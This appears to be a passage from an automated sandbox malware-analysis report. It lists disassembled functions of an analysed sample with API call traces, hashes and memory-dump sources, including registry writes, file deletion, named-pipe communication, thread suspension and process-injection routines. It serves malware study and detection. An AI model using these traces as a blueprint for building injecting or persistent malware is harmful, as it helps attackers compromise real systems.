    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3973
    • Part of subcall function 001C3ACC: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
    • Part of subcall function 001C3ACC: lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001C3ACC: HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D9BD6, Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 208 Total matches: 54filememorytime
Similarity
  • Total matches: 54
  • API ID: FindNextFileHeapFree$CloseHandleCompareFileTimeCreateFileGetFileTimeStrChrStrRChrlstrcatmemcpymemset
  • String ID: [FILE]$}nls
  • API String ID: 2232422578-3867520224
  • Opcode ID: d63c3d0b7d30395697a42598c95896d20b1220c6287163fcac3fa7287f978ce5
  • Instruction ID: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
  • Opcode Fuzzy Hash: C821E123044BD393D22369821181BA65755FB419E3C0C73F3E9BCB538D4F02A6CA6B96
  • Instruction Fuzzy Hash: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
APIs
  • memset.NTDLL ref: 001D9C3D
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D9C6F
  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 001D9C83
  • CloseHandle.KERNEL32(00000094), ref: 001D9C9A
  • StrRChrA.SHLWAPI(00001000,00000000,0000005C), ref: 001D9CA6
  • lstrcat.KERNEL32(00001000,001EDA23), ref: 001D9CE0
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9D28
  • StrChrA.SHLWAPI(?,0000002E), ref: 001D9D96
  • memcpy.NTDLL(001EB1D4,?,00000000), ref: 001D9DCF
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9DE4
  • CompareFileTime.KERNEL32(?,?), ref: 001D9E0D
  • HeapFree.KERNEL32(00000000,001EB1D4), ref: 001D9E43
  • HeapFree.KERNEL32(00000000,00001000), ref: 001D9E53
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C178D, Relevance: 18.1, APIs: 12, Instructions: 117 Total matches: 53registrythreadsleep
Similarity
  • Total matches: 53
  • API ID: CloseHandleRegCloseKey$CreateEventDeleteFileGetLastErrorRegOpenKeyResumeThreadSetEventSleepSuspendThread
  • String ID:
  • API String ID: 1489053536-0
  • Opcode ID: a04800037acdc991d0ac410cda6be3e7e30f85b4b2334a738cde70afcf2a0bc8
  • Instruction ID: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
  • Opcode Fuzzy Hash: BB0104704685824B81277464983A3BADA15FF802D5D4D6366FE68B40895F8333DA3F27
  • Instruction Fuzzy Hash: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C17A8
  • CloseHandle.KERNEL32(001EAF58), ref: 001C1809
  • DeleteFileW.KERNEL32(00000000,?,?,?,?,00000000), ref: 001C1816
  • GetLastError.KERNEL32(?,?,?,00000000), ref: 001C1820
  • RegCloseKey.ADVAPI32(?,?,?,?,00000000), ref: 001C187D
  • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 001C189C
  • SuspendThread.KERNEL32(00000000), ref: 001C18AA
  • CreateEventA.KERNEL32(001EB0D8,00000001,00000000), ref: 001C18BE
  • SetEvent.KERNEL32(00000000), ref: 001C18CB
  • CloseHandle.KERNEL32(00000000), ref: 001C18D2
  • Sleep.KERNEL32(000001F4), ref: 001C18E5
  • ResumeThread.KERNEL32(00000000), ref: 001C1909
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1A08, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 122 Total matches: 58memorythreadstring
Similarity
  • Total matches: 58
  • API ID: HeapFree$GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlImageNtHeaderlstrlenwsprintf
  • String ID: W
  • API String ID: 3968678070-655174618
  • Opcode ID: 65c7814ccee3740933dfcccc29e4eab5d936ac043747db4873335771aa46cfd7
  • Instruction ID: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
  • Opcode Fuzzy Hash: 8901B138088895A7C06790614063FBFD6017F822D0C4DF712F9693819E2F4372D35B57
  • Instruction Fuzzy Hash: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
APIs
  • RtlImageNtHeader.NTDLL ref: 001C1A48
  • GetCurrentThreadId.KERNEL32 ref: 001C1A5E
  • GetCurrentThread.KERNEL32 ref: 001C1A6F
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C1AE3
  • HeapFree.KERNEL32(00000000,00000020,00000000), ref: 001C1AF3
  • RtlAllocateHeap.NTDLL(00000000,00000400), ref: 001C1B3F
  • wsprintfA.USER32 ref: 001C1B50
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C1B5B
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C1B75
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B32CD0, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 108 Total matches: 183string
Similarity
  • Total matches: 183
  • API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
  • String ID: <
  • API String ID: 1457465641-4251816714
  • Opcode ID: 36c43c169b7f4adfcc7eed8db55d242cf47c4c2cff2d35238d5400cc3024a577
  • Instruction ID: 3de0f454e75166d7dc89cb568257ea8f04ae800c90f99e8cafab956dcc2645f6
  • Opcode Fuzzy Hash: 93F078708B2E8BC1CD9158C9160535692C06F30E68E9C9B137824F966B6B20312C9F9D
  • Instruction Fuzzy Hash: 3de0f454e75166d7dc89cb568257ea8f04ae800c90f99e8cafab956dcc2645f6
APIs
  • memset.NTDLL ref: 01B32CEE
  • CoInitializeEx.OLE32(00000000,00000002), ref: 01B32CF9
  • PathFindExtensionW.SHLWAPI(00000000), ref: 01B32D14
  • lstrcpyW.KERNEL32(00000000,01B38224), ref: 01B32D29
  • lstrlen.KERNEL32(01B37494,?,?,?,?,?,?,?,?,?,?,01B318D7,?), ref: 01B32D46
  • lstrcpyW.KERNEL32(00000000,01B384B8), ref: 01B32D77
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • wsprintfW.USER32 ref: 01B32DAE
  • ShellExecuteExW.SHELL32(0000003C), ref: 01B32DE3
  • CoUninitialize.OLE32 ref: 01B32DF7
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001C20A7, Relevance: 15.2, APIs: 10, Instructions: 171 Total matches: 60memorystringthread
Similarity
  • Total matches: 60
  • API ID: HeapFree$lstrlenmemcpy$RtlAllocateHeapSwitchToThreadlstrcpy
  • String ID:
  • API String ID: 732536130-0
  • Opcode ID: a427ae31280889244c8d76e620d9b5f9788be67866348582a82e8a58517c2dc5
  • Instruction ID: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
  • Opcode Fuzzy Hash: 90116D11582D32C3D113B46AC1E8B7EFA45FF961D6C1F3001E9127510E4A935EF6AB6E
  • Instruction Fuzzy Hash: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
APIs
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • lstrlen.KERNEL32(?,?,?,00000001), ref: 001C216D
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C218F
  • lstrcpy.KERNEL32(00000020,?), ref: 001C21AE
  • lstrlen.KERNEL32(?), ref: 001C21B8
  • memcpy.NTDLL(?,?,?), ref: 001C21F9
  • memcpy.NTDLL(?,?,?), ref: 001C220C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C224F
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • SwitchToThread.KERNEL32(?,00000000,?,?), ref: 001C2230
    • Part of subcall function 001C2B66: memset.NTDLL ref: 001C2BCA
    • Part of subcall function 001C2B66: CloseHandle.KERNEL32(?), ref: 001C2C13
    • Part of subcall function 001C2B66: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2DC7
    • Part of subcall function 001C2B66: GetLastError.KERNEL32(?,00000000,?), ref: 001C3013
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2275
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2291
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DB838, Relevance: 15.1, APIs: 10, Instructions: 64 Total matches: 62sleepsynchronization
Similarity
  • Total matches: 62
  • API ID: CloseHandle$LocalFreeRtlDeleteCriticalSectionRtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleepWaitForSingleObject
  • String ID:
  • API String ID: 1546928802-0
  • Opcode ID: 44cbb82d1bc8bc2d29e416fe044868003d437d2d6ba21b65bae40637e45a7bca
  • Instruction ID: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
  • Opcode Fuzzy Hash: 18E02BA421196647D99708B00461B1FAE82BBE23E484C3303F552A25C2BB0712C4DF2A
  • Instruction Fuzzy Hash: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
APIs
  • SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
  • CloseHandle.KERNEL32(?), ref: 001DB86F
  • CloseHandle.KERNEL32(?), ref: 001DB87D
  • RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
  • RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
  • Sleep.KERNEL32(000001F4), ref: 001DB8C1
  • CloseHandle.KERNEL32(?), ref: 001DB8CE
  • LocalFree.KERNEL32(?), ref: 001DB8DC
  • RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DAFC4, Relevance: 13.8, APIs: 9, Instructions: 278 Total matches: 59memorythread
Similarity
  • Total matches: 59
  • API ID: GetLastError$VirtualAlloc$RtlEnterCriticalSectionRtlLeaveCriticalSectionSwitchToThread
  • String ID:
  • API String ID: 2452875170-0
  • Opcode ID: f7250d7c747c6724e85bc87f4a1d164c9bcb3d791413c0bfd27e5859a3665385
  • Instruction ID: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
  • Opcode Fuzzy Hash: F931CCA2419FC2A7D5936A400890BBAC5C3FB12FF6D6CA732B674A02C81FC5274D2F54
  • Instruction Fuzzy Hash: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
APIs
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB03B
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB05A
  • GetLastError.KERNEL32 ref: 001DB20B
  • GetLastError.KERNEL32 ref: 001DB28D
  • SwitchToThread.KERNEL32(?,?,?,?), ref: 001DB2D2
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • GetLastError.KERNEL32 ref: 001DB308
  • GetLastError.KERNEL32 ref: 001DB317
  • RtlEnterCriticalSection.NTDLL(?), ref: 001DB327
  • RtlLeaveCriticalSection.NTDLL(?), ref: 001DB338
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CAC3A, Relevance: 13.6, APIs: 9, Instructions: 124 Total matches: 61memorystring
Similarity
  • Total matches: 61
  • API ID: memcpy$RtlAllocateHeapmemset$HeapFreelstrcmpi
  • String ID:
  • API String ID: 2612869081-0
  • Opcode ID: c2dacee3140373e500c22aac8ec47d9c8ec65dfe813f0c9f26dc5badd2c4d201
  • Instruction ID: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
  • Opcode Fuzzy Hash: 4201C028044DC281C42710841061FF9A506EFD13B5C8CAB76DDA13F08B5D0273F53797
  • Instruction Fuzzy Hash: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,00000018,001ED278), ref: 001CAC70
  • memset.NTDLL ref: 001CAC81
  • lstrcmpi.KERNEL32(?,?), ref: 001CACC1
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CACEA
  • memcpy.NTDLL(00000000,?,?), ref: 001CACFE
  • memset.NTDLL ref: 001CAD0B
  • memcpy.NTDLL(?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD24
  • memcpy.NTDLL(-00000005,001EC42B,00000007,?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD3F
  • HeapFree.KERNEL32(00000000,?), ref: 001CAD5C
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB593, Relevance: 13.6, APIs: 9, Instructions: 115 Total matches: 61memorystring
Similarity
  • Total matches: 61
  • API ID: RtlAllocateHeaplstrlen$HeapFree_wcsuprlstrcatlstrcpymemcpy
  • String ID:
  • API String ID: 1573093752-0
  • Opcode ID: f08ef74051028bad1df3046b05b27150d2409501bab8048f9561d94f45d3640f
  • Instruction ID: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
  • Opcode Fuzzy Hash: F9F0FEB01D1901DB8023453EE06037DE502AC442E2B1C8617FD80B525F7F4372E0BF59
  • Instruction Fuzzy Hash: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
APIs
  • lstrlenW.KERNEL32(00000000), ref: 001CB606
  • RtlAllocateHeap.NTDLL(00000000,001EAC82), ref: 001CB61C
  • memcpy.NTDLL(00000000,00000000,001EAC80), ref: 001CB62F
  • _wcsupr.NTDLL ref: 001CB63A
  • lstrlenW.KERNEL32(?,001EAC80), ref: 001CB66C
  • RtlAllocateHeap.NTDLL(00000000,?,001EAC80), ref: 001CB681
  • lstrcpyW.KERNEL32(00000000,?), ref: 001CB697
  • lstrcatW.KERNEL32(00000000,001EC940), ref: 001CB6B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB6C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4CEB, Relevance: 13.6, APIs: 9, Instructions: 94 Total matches: 33filememorystring
Similarity
  • Total matches: 33
  • API ID: lstrlen$CloseHandleDeleteFileHeapFreeMapViewOfFileRtlAllocateHeapUnmapViewOfFilewcstombs
  • String ID:
  • API String ID: 3071814901-0
  • Opcode ID: d05e3ff4273796c9b17326ba3024fd4693d54f1ec967c9ade7a5abc202e65e4f
  • Instruction ID: 7e783e8648c44d89f659e24c24dcd4eaacf23487424efcd1c96aaf08dceaf5d1
  • Opcode Fuzzy Hash: 8DF08B71654AC2CBD22778A6A6517BBF901FB532C3C4E3732DC40251681F4232D22B1B
  • Instruction Fuzzy Hash: 7e783e8648c44d89f659e24c24dcd4eaacf23487424efcd1c96aaf08dceaf5d1
APIs
    • Part of subcall function 001C7262: memset.NTDLL ref: 001C7284
    • Part of subcall function 001C7262: lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
    • Part of subcall function 001C7262: OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
    • Part of subcall function 001C7262: CloseHandle.KERNEL32(?), ref: 001C7331
  • MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,?,?,?,?), ref: 001C4D32
  • CloseHandle.KERNEL32(?), ref: 001C4D3E
  • lstrlenW.KERNEL32(00000000), ref: 001C4D58
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C4D69
  • wcstombs.NTDLL ref: 001C4D7A
  • lstrlen.KERNEL32(?), ref: 001C4D87
    • Part of subcall function 001D9462: lstrlen.KERNEL32(-00000002,00000000,?,-00000002,-00000002,?,001C4D99), ref: 001D9472
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • UnmapViewOfFile.KERNEL32(?,?,?,?,00000000,00000001), ref: 001C4DBC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C4DCE
  • DeleteFileW.KERNEL32(?), ref: 001C4DDC
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C164D, Relevance: 13.6, APIs: 9, Instructions: 89 Total matches: 49memoryregistrystring
Similarity
  • Total matches: 49
  • API ID: GetTickCountHeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapRtlImageNtHeaderStrRChrlstrlenwsprintf
  • String ID:
  • API String ID: 473458267-0
  • Opcode ID: 21cd21af9a4aaeb0892998a3b8bf2ca0770d14e129f35d2f1317603fddf0a3d6
  • Instruction ID: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
  • Opcode Fuzzy Hash: 82F05935850C435DC06788E5483AB3BE6417B002D8DDC6A33F9416D2066F8332969B6B
  • Instruction Fuzzy Hash: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
APIs
  • RtlImageNtHeader.NTDLL(?), ref: 001C165E
  • RtlAllocateHeap.NTDLL(00000000,00000011), ref: 001C1685
  • GetTickCount.KERNEL32 ref: 001C169C
  • wsprintfA.USER32 ref: 001C16AC
  • RegCreateKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C16E0
  • StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 001C16F8
  • lstrlen.KERNEL32(00000000), ref: 001C1702
  • RegCloseKey.ADVAPI32(?), ref: 001C171E
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C172C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB978, Relevance: 13.6, APIs: 9, Instructions: 82 Total matches: 110file
Similarity
  • Total matches: 110
  • API ID: GetLastError$CancelIoCloseHandleCreateEventGetOverlappedResultReadFileWaitForMultipleObjectsWriteFile
  • String ID:
  • API String ID: 340323113-0
  • Opcode ID: c76374ab722defcc6b7910d2b5a917f55ad2d99158a8d4548ff4996c05cdb32e
  • Instruction ID: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
  • Opcode Fuzzy Hash: B7E05C3D03050183442319B00225F9BAF186F662C7A8C33E2FE84CD6975B01BBE58152
  • Instruction Fuzzy Hash: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,001CBA84,00000008,?,00000010,00000001,00000000,0000012B), ref: 001CB997
  • WriteFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9CB
  • ReadFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9D3
  • GetLastError.KERNEL32 ref: 001CB9DD
  • WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 001CB9F9
  • GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 001CBA12
  • CancelIo.KERNEL32(?), ref: 001CBA27
  • CloseHandle.KERNEL32(?), ref: 001CBA37
  • GetLastError.KERNEL32 ref: 001CBA3F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B31224, Relevance: 13.6, APIs: 9, Instructions: 77 Total matches: 182registrymemorystring
Similarity
  • Total matches: 182
  • API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
  • String ID:
  • API String ID: 1756712956-0
  • Opcode ID: 7849c8b9b33a94634046e8246dea9d068437be0b98cf428e6df4f247afe7f281
  • Instruction ID: 18e037570c349af28e5fb9d2891916f9b52bff2a0339ffa6542edc82ff0ccd9b
  • Opcode Fuzzy Hash: F1F0278087CDC3C3CA49888A09653622058EFE2B45CBC9398B4803901C1FA03D6A2B8E
  • Instruction Fuzzy Hash: 18e037570c349af28e5fb9d2891916f9b52bff2a0339ffa6542edc82ff0ccd9b
APIs
  • PathFindFileNameW.SHLWAPI(01B3618C), ref: 01B31246
  • lstrcmpiW.KERNEL32(00000000,?,01B37494), ref: 01B3124D
  • RegOpenKeyExA.ADVAPI32(80000001,01B38080,00000000,00000000,?,?,01B37494), ref: 01B3127E
  • lstrlenW.KERNEL32(?,01B37494), ref: 01B31292
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 01B312AA
  • RegQueryValueExW.ADVAPI32(?,00000000,01B37494,00000000,01B37494,?,01B37494), ref: 01B312C9
  • StrStrIW.SHLWAPI(00000000), ref: 01B312E4
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B312F9
  • RegCloseKey.ADVAPI32(?,?,01B37494), ref: 01B31302
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001DC371, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109 Total matches: 97threadsynchronizationinjection
Similarity
  • Total matches: 97
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID: d
  • API String ID: 307323562-2564639436
  • Opcode ID: 3424cbb1137d2442c81198497add0441f4db132d4a2ce8cb8b6f8920268ef235
  • Instruction ID: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
  • Opcode Fuzzy Hash: 76018E064AAA7143C6022C158545FBAF186EB03FB9C5CF710D560304CE0B4574E1F669
  • Instruction Fuzzy Hash: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
APIs
  • memset.NTDLL ref: 001DC393
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
    • Part of subcall function 001D90C0: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D90ED
    • Part of subcall function 001D90C0: SetLastError.KERNEL32(00000000,?,001DC3F5,00000000,?,00010007,00000004,?), ref: 001D90F4
  • ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
  • SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
